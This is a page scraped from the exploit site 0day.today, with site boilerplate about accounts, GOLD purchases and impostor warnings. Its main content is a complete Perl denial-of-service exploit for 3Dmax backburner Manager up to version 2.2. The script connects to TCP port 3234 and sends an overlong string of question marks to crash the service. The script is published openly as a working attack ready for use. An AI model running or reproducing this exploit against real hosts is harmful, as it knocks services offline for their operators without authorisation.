0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
3Dmax 6.x backburner Manager <= 2.2 Denial of Service Exploit
============================================================= 3Dmax 6.x backburner Manager <= 2.2 Denial of Service Exploit ============================================================= #3Dmax backburner Manager Dos Exploit #There are security hole in 3Dmax backburner Manager Default listen port is 3234. #It's can be Dos by long string #Tested on Version #3dmax 5.0 backburner Manager Version 2.0 #3dmax 6.0 backburner Manager Version 2.2 #3dmax 6.0 SP1 backburner Manager Version 2.2 #All Windows OS #Found By Xtiger -->www.Xtiger.net&www.ThySea.com #Code by Xtiger coolsumer@163.com #Reference: http://jishu.thysea.com/index.php?modules=show&id=10327 ---------------------------------------------------------------- #!C:\perl\bin\perl.exe use IO::Socket; my $progname = $0; $progname =~ s,.'*/,,; $progname =~ s/\.\w*$//; $host = shift || 'localhost'; $port = shift || '3234'; $title = " =============================================\n‖ 3Dmax backburner Manager Dos Exploit 1.0! ‖\n =============================================\n BY tiger---www.Xtiger.net&www.ThySea.com\n"; $Usage = " Usage: $progname [Host] [port](default is 3234)\n"; if ($host > 0){ dos(); } else { usage(); } sub dos { my $socket = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => $port, ) or print "$title [*] ERR-->can't connect to $host:$port! :(\n" and exit; print ($title, "[*] connected to $host:$port\n"); print "[*] Sending string...\n"; print $socket ("?"x(2364),"\r\n") or die "$title [*] ERR-->Sending string failed! :(\n"; print "[*] maybe crashed!\n"; $socket->close; } sub usage { die $title,$Usage; } # 0day.today [2024-11-15] #